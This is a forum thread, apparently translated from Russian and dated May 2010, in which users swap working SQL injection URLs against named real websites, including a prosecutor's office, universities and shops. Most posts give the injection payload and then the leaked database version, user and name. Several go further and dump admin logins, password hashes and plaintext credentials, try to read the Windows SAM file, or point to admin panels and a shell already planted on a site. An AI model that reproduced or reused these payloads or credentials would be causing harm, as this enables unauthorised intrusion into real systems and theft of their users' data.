http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_en crypt(concat_ws(0x3a,@@version,user(),database(),@ @version_compile_os),0x71),0x71),5,6+--
version : 5.0.16-standard-log
user : prosecutor@ns.kursktelecom.ru
database : ProsecutoryDB
os : pc-linux-gnu
http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_en crypt(group_concat(login,0x3a,hash+SEPARATOR+0x0b) ,0x71),0x71),5,6+from+auth--
http://www.basw-ngo-by.net/page.php?issue_id=-292+union+select+1,2,3,4--
user(): BASWNGOBYNET@LOCALHOST
version(): 5.0.51A-24+LENNY1-LOG
database(): BASWNGOBYNET
OS: DEBIAN-LINUX-GNU
aka_zver
05.05.2010, 17:11
Site: http://www.laktomir-nsk.ru
TIC: 10
PR: 1
Example request: http://www.laktomir-nsk.ru/index3.php?id=-23+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os)--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_laktomir
os - pc-linux-gnu
=========================================
Site: http://www.spectehsnab.ru
TIC: 0
PR: 2
Example request: http://www.spectehsnab.ru/index3.php?id=251+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.38-Ubuntu_ubuntu-log
user - apache@localhost
database - spectehsnab
os - pc-linux-gnu
=========================================
Site: http://www.tectoria.co.jp
TIC: 0
PR: :confused:
Example request: http://www.tectoria.co.jp/products/index3.php?id=1'+and+1=cast((SELECT+version()||chr (58)||current_user||chr(58)||current_database())+a s+int)--&cnt=
version - PostgreSQL 7.3.15 on i686-pc-linux-gnu, compiled by GCC 2.96
user - s06010103
database - products_DB
os - pc-linux-gnu
MySQL 4.1.14-nt
server is on Windows
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(0x3a,user,0x3a,password,0x3a,file_priv))),11 ,12+from+mysql.user+--
result
:root:*0га:Y
loading the SAM file
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,hex(load_file(0x6 33a2f77696e646f77732f7265706169722f73616d)),11,12+ from+mysql.user+--
in hex
http://www.wbstraining.com/php/events/showevent.php?id=-157+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+from+infor mation_schema.tables
aka_zver
05.05.2010, 21:23
Site: http://www.cosmicus.nl
TIC: 10
PR: 5
Example request: http://www.cosmicus.nl/site/index3.php?id=-186+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,group_concat (0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30+from+inform ation_schema.tables--+
version - 5.0.24a-standard
database - cmcuser@localhost
user - cosmicus
os - pc-linux-gnu
==================================
Site: http://www.film.ua
TIC: 50
PR: 4
Example requests: http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+or+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid(version(), +1,+63),+floor(rand(0)*2)))--+
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+union+select+1,2--+
Registration required ^^
version - 5.0.84-log
user - film2@localhost
database - film2
os - pc-linux-gnu
http://www.zideo.nl/index.php?option=com_content&id=-142+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29--
User: root@localhost
Version: 5.0.51a-community-nt-log
Database: admin_zideo
Google PR: 5
Something's off with the admin panel!
straight to the admin
http://dyadem.it/media/pr.php?id=-34+union+select+1,2,3,4,concat(username,char(58),p assword)+from+calendar.users+limit+0,1--
[Machine: i386 ] --- [OS : portbld-freebsd6.3 ] --- [ DB Version: 5.0.90 ] --- [ Version Comment: FreeBSD port: mysql-server-5.0.90 ] --- [ System User: root@localhost ] --- [ Hostname: ruslana.ua ] --- [ DataDir: /var/db/mysql/ ] --- [ Basedir: /usr/local/ ] --- [ tmp Dir: /var/tmp/ ] --- [ Database: ruslana ] --- [ Storage Engine: MyISAM ] --- [ SQL Warnings: 0 ] --- [ Server ID: 1 ] --- [ License: GPL ] --- [ Secure Auth: 0 ] --- [ Expire Logs Days: 0 ] --- [ Log Warnings: 1 ] --- [ System Time Zone: UTC] ----- [ Time Zone: SYSTEM ]
http://www.bcspeakers.com/product.php?id=-0000000046+union+select+1,2,3,4,5,6,concat(usernam e,char(58),password),8,9,10,11,12,13,14,15+from+_u ser--
http://www.estaciontierra.com/artistas/artista.php?id=-164+union+select+1,2,3,4,5,user(),7,8,9,@@version_ compile_os,11,database(),version(),14--
http://www.webjournal.unior.it/Articoli.php?IdVolume=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( name,char(58),password)+from+admin--
err0rFrost
05.05.2010, 23:34
http://www.databankgroup.com/index1.php?linkid=-999+union+SELECT+GROUP_CONCAT(table_name)+FROM+inf ormation_schema.tables--
pr5
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9/*
pr6
http://telemex.ru//index.php?category=-1+union+all+select+1,2,3,concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),5+--
version : 5.1.34
user : reee_biz@localhost
database : reee_biz
os : linux-gnu
..::TROYAN::..
06.05.2010, 09:09
http://www.homegate.ru/board?code=show&id=-28409+union+select+1,2,3,4,5,6,concat_ws(0x3a,nick ,hash,salt,email),8,9,10,11,12,13,14+from+neway_us ers--
PR:3
TIC:50
Traffic: 1.5k-2k per day.
http://www.samenta.ru/catalog/?lang=rus&c_id=1&p_id=-1+union+select+1,2,3,4,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17+--
version : 4.0.26
user : samentaru@samenta.ru
database : samentaru
os : unknown-freebsd6.1
LanSilot
06.05.2010, 12:53
http://www.bcspeakers.com/product.php?id=-11+union+select+1,concat(username,0x3a,password),3 ,4,5,6,7,8,9,10,11,12,13,14,15+from+_user--
lcd:lcd2008
bcadmin:bc2008
http://market.remont99.ru/news.php?id=-16+union+all+select+1,concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),3,4,5,6,7+--
version : 4.1.25-log
user : remont94_olga@localhost
database : remont94_db
os : portbld-freebsd6.3
Financier
06.05.2010, 13:04
http://www.ayrshireandgalloway.co.uk/news.php?id=99999+union+select+1,2,3,4,5--
http://www.treatbalham.co.uk/news.php?id=99999+union+select+1,2,version(),4,5,6 +from+news--
http://www.saintstrust.co.uk/news.php?id=99999+union+select+1,2,3,4,5,concat_ws (0x3a,username,password,email),7,8+from+t_user+lim it+0,1--
http://www.vibixa.co.uk/news.php?id=9999+union+select+1,table_name,3,4,5,6 +from+information_schema.tables+limit+17,1--
career category client colour gallery_image garden_accessories link order_head
page roof_style seating_upholstery summerhouse summerhouse_has_colour summerhouse_has_garden summerhouse_has_garden_order summerhouse_has_roof
summerhouse_has_seating
http://connexions.oberon.titaninternet.co.uk/news.php?id=9999+union+select+1,2,version(),4,5--
http://www.arbroathpool.co.uk/news.php?id=99999+union+select+1,2,version()+from+ news--
http://www.kentonvineyard.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6, 7,8+from+information_schema.tables+limit+17,1--
gst_events gst_news gst_products
http://www.staddonheightsgolf.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6, 7,8,9,10+from+information_schema.tables+limit+28,1--
wcusers:username wcusers:password wcusers:ip //but the table is empty.
http://www.docbrown.co.uk/news.php?id=999+union+select+1,2,version(),4+news--
http://www.rimrecords.co.uk/rim-news.php?id=9999+union+select+1,2,3,version()--
http://www.krehalonuk.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19+from+news--
http://www.forceofnature.org/events.php?id=-36+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10--+
version:5.0.45-log
user:fonadmin@cgi0506.int.bizland.net
aka_zver
06.05.2010, 17:24
Site: http://www.travellux.com
TIC: 70
PR: 4
Example request: http://www.travellux.com/index4.php?mode=57&select=about_us&id=-1364'+union+select+1,2,3,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),group_conc at(0x0b,id,0x3a,name,0x3a,email,0x3a,password),nul l,null,8,9,10,11,12,13,14,15,16,17+from+users--+
version - 5.0.84-log
user - travell@localhost
database - travell00
os - portbld-freebsd6.1
=========================================
Site: http://www.tangotiger.net
TIC: 10
PR: 3
Example request: http://www.tangotiger.net/scout/index4.php?teamid=-114+union+select+concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, column_name),3,4,null,null,7,null,null,now(),null, null,null,null,null,null+from+information_schema.c olumns--+
version - 5.0.67-log
user - scoudb@redbull.dreamhost.com
database - scoudb
os - pc-linux-gnu
=========================================
Site: http://artem.ip-nsk.ru
TIC: 0
PR: 0
Example request: http://artem.ip-nsk.ru/tdk/index4.php?idd=-53+union+select+1,group_concat(0x0b,id,0x3a,userna me,0x3a,password),3,null,5,6,7,8,9,10+from+cute_us ers--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_tdk
os - pc-linux-gnu
Skofield
06.05.2010, 17:53
http://www.carnegie-institute.edu/careerPosting.php?id=-1+union+select+1,version(),3,4,5/*
Database Version: 4.1.25-Debian_mt1
Database name: db8721_content
User name: db8721@64.13.192.36
----------------------------------------------------------------------------------------------------------
http://ecet.spsu.edu/FacultyStaff.php?id=-24+union+select+1,version(),3,4,5,6,7,8,9,10--
Database Version: 5.0.77
Database name: ecet
User name: ecet@localhost
----------------------------------------------------------------------------------------------------------
http://www.bikeweek.org.uk/page.php?id=64'+union+select+1,group_concat(user_i d,0x3a,user_password),3+from+users/*
Look at the source code
Database Version: 4.1.22-community-nt-log
Database name: bikeweek10live
User name: bikeweek10@localhost
aka_zver
06.05.2010, 20:09
Site: http://www.infotex.ru
TIC: 80
PR: 4
Example requests: http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,column_name), 3,4,concat_ws(0x0b,version(),user(),database(),@@v ersion_compile_os),6,now(),8,9+from+information_sc hema.columns+where+table_name=0x7573657273--+
http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,login,0x3a,ha sh,0x3a,salt),null,4,group_concat(0x0b,mail),6,now (),8,9+from+users--+
version - 5.1.36-log
user - fotoclub31_mysql@212.193.241.39
database - fotoclub31_computer31
os - portbld-freebsd7.2
========================================
Site: http://www.kazanclub.ru
TIC: 20
PR: 0
Example requests: http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3,4,5,6--+
http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,group_concat(0x0b,column_name),3, 4,5,6+from+information_schema.columns--+
version - 5.1.41-log
user - kazanclu_rukazan@localhost
database - kazanclu_rukazanclub2
os - unknown-linux-gnu
-=ASSKAKO=-
06.05.2010, 21:14
http://www.zaglyani.ru/links/category.php?dir=2&uid=-921+union+select+1,concat_ws(user(),version(),data base()),3,4,5,6,7,8,9,10,11,12+--+
user() - u156963@10.10.153.211
version() - 5.0.67-log
database() - u156963
http://www.carte-bleue.com/page.asp?menu_id=26+OR+1=(SELECT+TOP+1+password+FR OM+tbl_user_admin+where+Login='webadmcb')
(pinch sps)
KENT1994
06.05.2010, 22:42
www.warrenfarrell.com/pages.php?id=29UNION ALL SELECT 1,%String_Col%,3,4,5,6,7--
Host IP: 216.218.227.242
Web Server: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7a DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a
Powered-by: PHP/4.4.0
DB Server: MySQL
Current DB: warren
www.lulworth.nl/pages.php?id=1018UNION ALL SELECT %String_Col%,2,3,4--
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen
www.warehouse.lv/pages.php?id=companyUNION ALL SELECT %String_Col%,2 and 'x'='x
Host IP: 213.21.225.48
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: warehouse
www.medy.ru/pages.php?id=296UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
Host IP: 77.221.132.188
Web Server: nginx/0.4.13
Powered-by: PHP/5.2.0-8+etch11
DB Server: MySQL >=5
Current DB: dex
www.lulworth.nl/pages.php?id=1286 UNION ALL SELECT %String_Col%,2,3,4--
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen
www.nfu.edu.tw/inlet/pages.php?ID=Prospective AND %True_Expression% AND 'x'='x
Host IP: 140.130.1.19
Web Server: Apache/2.2.10 (Unix) PHP/4.4.9
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: RSS23_NFU
www.connexions-berkshire.org.uk/pages.php?id=95UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.230
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire
www.marinaautostadium.com/pages.php?id=24 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL >=5
Current DB: rhinossoccer
spherics
07.05.2010, 11:28
Some kind of shop..
http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+union+select+concat_ws(0x3a,user(),version(), database())--&a=add
Database Version: 5.0.89-community
Database name: pcrakit_cmscatalog
User name: pcrakit_usercms@localhost
There are about 3000 Rakitan members there -)
http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+UNION+SELECT+CONCAT(0x3a,(SELECT+CONCAT(membe rs_password,0x3a,members_email)+FROM+pcrakit_cmsca talog.cms_members+LIMIT+50,1),0x3a)-- &a=add
http://www.brilliant-info.ru/showinfo.php?id=99999+or%281,1%29=%28select+count% 280%29,concat%28%28select+concat_ws%280x3a,user%28 %29,version%28%29,database%28%29%29+from+informati on_schema.tables+limit+0,1%29,floor%28rand%280%29* 2%29%29from%28information_schema.tables%29group+by +2%29--++
User: u55884@localhost
Version: 5.0.77
Database: brillian_info
http://www.procctv.ru/page.php?id=-1%27+or%281,1%29=%28select+count%280%29,concat%28% 28select+concat_ws%280x3a,user%28%29,database%28%2 9,version%28%29%29+from+information_schema.tables+ limit+0,1%29,floor%28rand%280%29*2%29%29from%28inf ormation_schema.tables%29group+by+2%29--++
User: procctv@localhost
Database: cms
Version: 5.0.45-log
http://www.advokaterne.net/index.php?act=info&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,version%28%29,da tabase%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: web57_u1@localhost
Version: 5.0.51a-24+lenny3
Database: web57_db1
http://www.bad-endbach.info/index.php?id=1699&lang=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,version%28%29,da tabase%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: 'dbo242799363@212.227.119.4
Version: 5.0.81-log
Database: db242799363
http://www.belmontburlesque.com/cast.php?id=-2+union+select+1,group_concat%28user_name,0x3a,use r_password%29,3,4,5,6,7+from+administrators--
p@pillon
07.05.2010, 19:34
Pr 3
http://www.lanceburton.org/
http://www.lanceburton.org/cast.php?id=-1+union+all+select+1,2,version(),4,5,6
User: LANCEBURT@APACHE2-ICHIBAN.CONSTANTINE.DREAMHOST.COM
Version: 5.1.39-LOG
Database: LBURTON
http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),3+--
version : 5.0.24-standard
user : troykastal@localhost.localdomain
database : db_troykastal
os : pc-linux-gnu
http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,login,passwo rd),3+from+admin--
http://www.troykastal.ru/administrator/
Eh, I got tired of messing with it
http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29,19,20,21,22,23,24,25,26, 27%20+--+&cid=36&rating=3&full
User: turby@localhost
Database: turby
Version: 5.0.32-Debian_7etch5
And here is everything I dug up while messing with it:
http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,concat_ws%280x3a,table_schema,TABL E_NAME%29,19,20,21,22,23,24,25,26,27%20from%20info rmation_schema.tables%20--+&cid=36&rating=3&full
And, accordingly, no hashes ;)
http://www.glosters.org.uk/collectionitem.php?id=1721%20and%2030=3%20union%20 all%20select%201,2,group_concat(id,0x3a,username,0 x3a,password,0x3a,lastseen,0x3a,access,0x3a,email) ,4,5,6,7,8,9,10,11,12,13,14%20from%20staff--
http://www.linorusso.ru/catalog.php?parent_id=36&tov_id=-194+union+select+1,2,3,4,5,6,concat_ws(char(58),@@ version,user(),database(),@@version_compile_os),8, 9,10,11,12,13,14,15,16,17,18,19,20--+
version : 6.0.11-alpha-log (first time I have come across version 6)
user : tehnodom@localhost
database : linorusso
os : portbld-freebsd7.1
http://www.diabetes.ee/foorum-teema.php?lk=-33681+union+select+1,2,3,4,concat(user(),version() ,database(),@@version_compile_os)--
http://www.megazone.ee/index2.php?id=5&news_id=-3+union+select+1,concat(username,char(32,58,32),pa ssword),3,4+from+cms_admin--
someone else has also uploaded a shell here ))
http://www.megazone.ee/dev/pic_big.php
LanSilot
08.05.2010, 15:25
http://www.tutpricol.ru/message.php?id=-92+union+select+1,2,3,concat(version(),0x3a,databa se(),0x3a,user()),5--
User: tutpric5_root@localhost
Database: tutpric5_tutpricol
Version: 4.1.25-log
aka_zver
08.05.2010, 16:46
Site: http://www.mebek.ru
TIC: 20
PR: 2
Example query: http://www.mebek.ru/index4.php?id=-9+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os)--+
version - 4.1.22
user - mebek01@fix.hc.ru
database - wwwmebekru
os - portbld-freebsd7.0
=========================================
Site: http://www.maslov-pr.com
TIC: 70
PR: 3
Example query: http://www.maslov-pr.com/index5.php?a=6&poda=7&id=-3+union+select+1,2,3,unhex(hex(concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os)))--+
version - 4.1.18
user - maslov01_1@tex.hc.ru
database - wwwmaslovprcom_1
os - unknown-linux-gnu
=========================================
Site: http://www.moloko-nsk.ru
TIC: 0
PR: 1
Example query: http://www.moloko-nsk.ru/index4.php?id=-17+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os)--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_moloko
os - pc-linux-gnu
=========================================
Site: http://ratukencana.com
TIC: 0
PR: 0
Example queries: http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+concat_ws(0x0b,version(),user(),da tabase(),@@version_compile_os),2,3--+
http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+group_concat(0x0b,nm_user,0x3a,pwd _user),2,3+from+sys_users--+
version - 5.0.51a-24+lenny3
user - t54052_root@localhost
database - t54052_ratukencana
os - debian-linux-gnu
BrainDeaD
08.05.2010, 21:29
http://www.effedieffe.com/interventizeta.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20--
Database: effedieffe_old
Version: 5.0.77-log
User: fdfdbuser@localhost
PR: 6
At first I thought it was a repost, since an SQL injection from this site had already been posted, but the database there is completely different.
If I'm wrong, delete it.
http://www.interarmees.fr/article.php?article=-1020+union+all+select%201,2,3,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,5,6,7,8--
5.0.51a-24+lenny3:interarmees_web:interarmees@gcc-www
http://www.teamarena.ru/user_gallery/10556+union+select+1,2,concat(version(),user(),dat abase()),4,5,6,7
life_glider
09.05.2010, 01:58
http://www.koliz.nnov.ru/catalog/?action=printprod&prod_id=-109%20union%20select%201,concat%28version%28%29,0x 7e,user%28%29,0x7e,database%28%29,0x7e,@@version_c ompile_os%29%20--
5.0.87-log~koliz@localhost~koliz~portbld-freebsd6.4 - version,user,database,os
http://www.alkom.nnov.ru/catalog/?prod_id=-109%20union%20select%201,concat_ws%280x3a,version% 28%29,user%28%29,database%28%29,@@version_compile_ os%29%20--
5.0.87-log : alkom@localhost : alkom : portbld-freebsd6.4
http://users.kharkiv.com/orgtech/index.php?page=show_tovar&tovar_id=-16%20union%20select%201,2,3,4,5,6,7,8,concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29,@@ver sion_compile_os%29,10,11,12,13--
4.0.27 : orgtech@localhost : orgtech : portbld-freebsd5.4
www.autogazette.de/printable.php?id=-2000757 union select 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database() ,version()),6--
nemaniak
09.05.2010, 13:44
quakerbridgemall.com PR-5
http://www.quakerbridgemall.com/offers.php?id=39+union+all+select+1,concat_ws%280x 3a,version%28%29,user%28%29,database%28%29%29,3,4, 5,6,7,8,9,0+--+
5.0.27:quakerdb2user@localhost:QuakerDB2
aka_zver
09.05.2010, 15:26
Site - http://www.animationtrip.com
TIC: 10
PR: 4
Example query: http://www.animationtrip.com/item.php?id=-257+union+select+1,2,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),4--+
version - 4.1.22-standard-log
user - animationtrip@localhost
database - animationtrip
os - pc-linux-gnu
===========================================
Site: http://www.paer.ru
TIC: 130
PR: 3
Example query: http://www.paer.ru/info/item.php?id=11+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.75-log
user - srv19733_root@c27-w.ht-systems.ru
database - srv19733_db1
os - portbld-freebsd7.0
===========================================
Site: http://plusiminus.com
TIC: 170
PR: 4
Example query: http://plusiminus.com/item.php?id=412+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(m id(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.1.41-log
user - m35978@fhe11.hoster.ru
database - db35978m
os - portbld-freebsd8.0
===========================================
Site: http://www.purepeopleproducts.com
TIC: 0
PR: 3
Example query: http://www.purepeopleproducts.com/index5.php?id=-12+union+select+concat_ws(0x0b,version(),user(),da tabase(),@@version_compile_os)--+
version - 5.0.51a-3ubuntu5.5-log
user - CN20070091@localhost
database - CN20070091_ppp
os - debian-linux-gnu
https://www.infoslice.com/?cmd=del&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,database%28%29,v ersion%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: infoslice@localhost
Database: infoslice
Version: 5.1.44
http://www.knowledgeforaction.info/articoloPrt.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3/*
User: de kfainfo_db@64.202.163.81
Database: kfainfo_db
Version: 4.0.27-max-log
aka_zver
09.05.2010, 16:36
Site: http://tractor.ru
TIC: 2000
PR: 5
Example query: http://tractor.ru/partners/index5.php?id=-11767+union+select+1,db_name(),@@version,system_us er,user,6,7,8,9,10,11,12,13--+
version - Microsoft SQL Server 2005 - 9.00.4053.00 (X64) May 26 2009 14:13:01 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
system user - specserver-2
user - dbo
database - specserver-2
===========================================
Site: http://www.bxllaique.be
TIC: 0
PR: 5
Example query: http://www.bxllaique.be/index5.php?m1=0&m2=2&id=52&g=2+or+(select+count(*)+from+(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid(unhex(hex (@@version_compile_os)),+1,+63),+floor(rand(0)*2)) )--+
version - 4.1.9-standard-log
user - bxllaique@localhost
database - bxllaique
os - pc-linux-gnu
===========================================
Site: http://www.capstonetea.com
TIC: 0
PR: 3
Example query: http://www.capstonetea.com/index4.php?ID=11+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( mid(version(),+1,+63),+floor(rand(0)*2)))
version - 4.1.22-standard
user - capstone_capston@localhost
database - capstone_CapstoneWeb
os - pc-linux-gnu
BrainDeaD
09.05.2010, 19:56
A couple of German ones
http://www.neusserkarneval.de/presse/show.php?id=-1+union+select+1,database(),version(),4,5,6,7,8,us er(),10,11,12,13,14%20--
Database: db215839
Version: 4.1.22-standard-log
User: db215839@local2
http://www.art-in.de/incmeldung.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8%20--
Database: db1082979-artintv
Version: 5.0.32-Debian_7etch11-log
User: dbu1082979@localhost
PR: 4
TIC: 20
=====================================================================
For metal fans
http://www.avantgarde-metal.com/content/stories2.php?id=-86%27%20union%20select%201%2C%202%2C%20concat_ws(0 x3a,database(),version(),user())%2C%204%2C%205%2C% 205%23%20AND%20%271%27=%271
Database: d0052127
Version: 4.1.22-max-log
User: d0052127@localhost
PR: 3
http://suriyanto.net/rock/rockmusic.php?id=3337'+union+select+1,2,3,4,5,6,7, 8%23+AND+%271%27=%271
Database: suriyant_muziek
Version: 5.0.81-community
User: suriyant_yanto@localhost
PR: 3
=====================================================================
http://www.brushesdownload.com/tfile.asp?id=-1250'+union+select+1,concat_ws(0x3a,database(),ver sion(),user()),3,4,5,6,7'
Database: dbbrushesdownload
Version: 5.1.45-community
User: brushesd@C24327-34937
PR: 4
http://www.carbodydesign.com/video/?id=-2990+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,database(),version(),user()),11,12,13,14,15,16,17 ,18,19,20,21%20--
Database: carbodyd_db
Version: 5.0.90-community
User: carbodyd_dbuser@localhost
PR: 3
TIC: 80
KENT1994
09.05.2010, 20:46
www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
fruitharvesting.com/productinfo.php?id=52UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x
www.brill.se/productInfo.php?id=111UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23--
www.atmtravel.com.au/productinfo.php?id=-123 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--
www.hypetrading.com/productinfo.php?id=285UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9--
www.jemesp.com/productInfo.php?id=4UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
www.wedding-cake-toppers.com.au/productinfo.php?ID=15 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression% AND 'x'='x
www.jemesp.com/productInfo.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
www.theshopnyny.com/productinfo.php?id=928UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20--
www.gmscsolution.com/productinfo.php?id=384 UNION ALL SELECT 1,%String_Col%,3,4,5--
www.fullcirclefurnishings.com/productinfo.php?id=213 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
www.bugnbots.com/productinfo.php?ID=6 UNION ALL SELECT %String_Col%,2,3,4--
www.luckinthebox.com/productinfo.php?id=262 AND %True_Expression%
www.kingsleysestates-furnishings.co.uk/productinfo.php?id=411 AND %True_Expression% AND 'x'='x
www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression%
superwholesales.com.au/productinfo.php?id=10 AND %True_Expression%
marqueeequity.com/productinfo.php?id=9 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--
www.idoweddingfavours.com.au/productinfo.php?ID=406 UNION ALL SELECT %String_Col%,2,3,4,5,6,7--
fruitharvesting.com/productinfo.php?id=49 UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x
www.blackkatzfurnishings.com/productinfo.php?id=499 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
fullcirclefurnishings.com/productinfo.php?id=367 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
http://response.restoration.noaa.gov/faq_topic.php?faq_topic_id=-1+union+select+1,2,concat(user(),char(58),version( ),char(58),database(),char(58),@@version_compile_o s),4,5,6,7,8,9,10+from+users--
CyberHunter
10.05.2010, 02:21
http://www.assetrisk.com/about-us/people.php?ID=-34+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.51a-community-nt
User: root@localhost
Database: assetrisk
http://www.magelectric.ru/?p=-196+union+all+select+1,2,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),4,5,6, 7+--
version : 5.0.22
user : magelectric@localhost
database : magelectric
os : redhat-linux-gnu
aka_zver
10.05.2010, 13:12
